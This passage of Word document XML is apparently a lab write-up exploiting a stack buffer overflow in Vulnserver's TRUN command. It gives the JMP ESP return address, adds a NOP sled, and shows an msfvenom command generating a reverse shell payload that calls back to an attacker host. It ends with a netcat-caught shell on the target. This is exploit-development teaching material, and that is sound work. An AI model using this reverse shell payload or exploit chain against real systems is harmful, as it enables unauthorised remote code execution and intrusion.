          <w:left w:val="single" w:color="000000" w:sz="4"/>
          <w:right w:val="single" w:color="000000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0x625011af : jmp esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[essfunc.dll]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">ASLR: False | Rebase: False | SafeSEH: False | CFG: False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This address was written into the exploit script as the return address, in little-endian byte order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="21705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29200" cy="2170556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 — Return address 0x625011af inserted as \xaf\x11\x50\x62.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Adding the NOP Sled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A 16-byte NOP sled (0x90) was added immediately after the return address. Since ESP lands at this position after the JMP ESP gadget executes, the sled provides a small safety margin so that execution reliably slides into the shellcode even if the exact landing offset shifts by a few bytes between runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="24243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29200" cy="2424390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 — NOP sled added between the return address and the (not yet added) shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Generating Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A reverse shell payload was generated with msfvenom, excluding null bytes (\x00) which are known to terminate the TRUN command's string handling:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="4"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4"/>
          <w:left w:val="single" w:color="000000" w:sz="4"/>
          <w:right w:val="single" w:color="000000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.206.1 LPORT=6969 \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -b '\x00' -f python -v shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4389120" cy="477470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9120" cy="4774706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9 — msfvenom output: 351-byte x86/shikata_ga_nai-encoded reverse shell payload targeting 192.168.206.1:6969.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The generated shellcode was inserted into the exploit script, and the final payload was assembled as padding + return address + NOP sled + shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4754880" cy="56989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54880" cy="5698990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 — Completed exploit.py with the full buffer assembly: buffer = head + padding + return_addr + nop_sled + shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A netcat listener was started on the attacking machine to catch the reverse shell, then the exploit script was executed against the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="92987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29200" cy="929878"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11 — Exploit script connecting to the target and sending a 2383-byte payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The listener received a callback and returned an interactive shell on the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="410505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4105051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 — Reverse shell established. whoami confirms code execution as cicada-pc\cicada, and dir lists the vulnserver directory contents, confirming full remote code execution on the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A working exploit was developed for the TRUN command in Vulnserver, achieving remote code execution via a classic stack-based buffer overflow rooted in an unchecked strcpy() call inside Function3(). The exploit chain relied on:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying the root cause in source: Function3 copies attacker-controlled input into a fixed 2000-byte stack buffer (Buffer2S) using strcpy, with no length check, while callers may supply up to 3000 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A precise, confirmed offset (2006 bytes) to the saved return address, established via source review and an incremental fuzzing loop followed by a marker-value crash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Clean, direct EIP control (not an SEH-based overwrite)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A reliable JMP ESP gadget in essfunc.dll, selected specifically because the module has no ASLR, SafeSEH, or rebasing protections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A NOP sled to absorb minor landing variance before execution reaches the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">An encoded, null-byte-free reverse shell payload matched to the protocol's constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This exercise demonstrates the full standard workflow for classic Windows stack-based overflow exploitation on an unprotected 32-bit target, from source-level root cause analysis through to working remote code execution. Natural next steps to build on this work include repeating the process against an SEH-based crash on a different Vulnserver command (e.g. GMON or KSTET, which require a POP/POP/RET gadget instead of JMP ESP), and progressing to targets with DEP and ASLR enabled, which require ROP-chain-based exploitation rather than a direct shellcode jump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note on methodology: a full bad-character analysis (systematically testing byte values \x00–\xff through the buffer and comparing hex dumps) is recommended as a standard step before shellcode generation in future writeups, to confirm the complete set of bytes the target protocol mangles beyond the null byte excluded here.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68e90a7ddefe11bcd59e70c08cac1dc26d6b3a7.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9f1d6c39194100a2ca023de05c57a16be6773b09.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6e5797ec4bb5d7e4f4e9bc38fa0a8cd643880f96.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/248d4e88dc92d7065a0ee2f3d83df73e3f5c070d.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7427fce129fc4d0f23ea0d372f179a6a2e3354cb.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6a8195db6db03b42433042cc61a1508f726cd4c9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3ce833b13e4ea7d41400f340e2b06155ef6dfd45.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/913d962d2a70bf8fbe4e905f341b6cc03c29aaab.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d67bf2b27137d75b57d6459e63f6b292202e33e5.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/98413cbae761691eb41fbf48decbbf312c69bc7d.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/43e719cc51789e51eb5e5509f99e458ed8de6d2d.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0c31a920c58c7e8779bd467d6e27d0dc727b31b6.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/759a2e3d20516734fa37ed09a8cfeac5b2840b81.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e54b76e41eab57c8ff9b88ef065f6f4ae201ec27.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2026-09-17T08:34:08.009Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T08:34:08.020Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>